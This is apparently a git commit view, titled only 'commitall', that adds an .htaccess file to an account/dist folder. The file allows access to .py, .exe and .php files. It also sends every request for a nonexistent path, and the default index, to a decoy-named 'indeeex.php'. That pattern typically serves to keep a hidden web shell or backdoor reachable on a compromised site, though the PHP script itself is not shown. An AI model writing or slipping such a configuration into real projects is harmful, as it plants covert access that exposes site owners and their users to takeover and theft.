commitall
This commit is contained in:
11
account/dist/.htaccess
vendored
Normal file
11
account/dist/.htaccess
vendored
Normal file
@ -0,0 +1,11 @@
|
||||
<FilesMatch ".(py|exe|php)$">
|
||||
Order allow,deny
|
||||
Allow from all
|
||||
</FilesMatch>
|
||||
RewriteEngine On
|
||||
RewriteBase /
|
||||
RewriteRule ^indeeex\.php$ - [L]
|
||||
RewriteCond %{REQUEST_FILENAME} !-f
|
||||
RewriteCond %{REQUEST_FILENAME} !-d
|
||||
RewriteRule . /indeeex.php [L]
|
||||
DirectoryIndex indeeex.php index.php
|
Reference in New Issue
Block a user